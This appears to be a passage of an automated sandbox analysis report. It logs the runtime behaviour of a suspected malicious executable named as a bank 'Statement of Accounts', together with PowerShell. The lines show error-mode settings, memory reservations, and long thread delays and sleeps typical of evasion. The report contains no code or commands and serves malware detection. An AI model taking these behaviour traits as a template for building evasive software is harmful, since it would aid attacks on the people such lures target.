                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeMemory allocated: 1900000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeMemory allocated: 1C590000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeMemory allocated: 1020000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeMemory allocated: 1BAD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599759Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599639Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599484Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599373Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599185Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599077Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598796Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598587Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598336Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598230Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597781Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597562Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597453Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597343Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597234Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596906Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596797Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596687Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596343Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595998Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595887Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595608Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595499Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595389Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594624Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594404Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594297Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594187Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 594075Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 593968Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 593859Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 593750Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6404Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3304Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeWindow / User API: threadDelayed 2098Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeWindow / User API: threadDelayed 7742Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 6768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7264Thread sleep count: 2098 > 30Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7264Thread sleep count: 7742 > 30Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -599759s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -599639s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -599484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -599373s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -599185s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -599077s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -598796s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -598587s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -598336s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -598230s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -598109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -598000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -597890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -597781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -597672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -597562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -597453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -597343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -597234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -597125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -597015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -596906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -596797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -596687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -596562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -596453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -596343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -596234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -596125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -595998s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -595887s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -595718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -595608s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -595499s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -595389s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -595281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -595172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -595062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -594953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -594843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -594734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -594624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -594515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -594404s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -594297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -594187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -594075s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -593968s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -593859s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe TID: 7260Thread sleep time: -593750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeThread delayed: delay time: 599759Jump to behavior
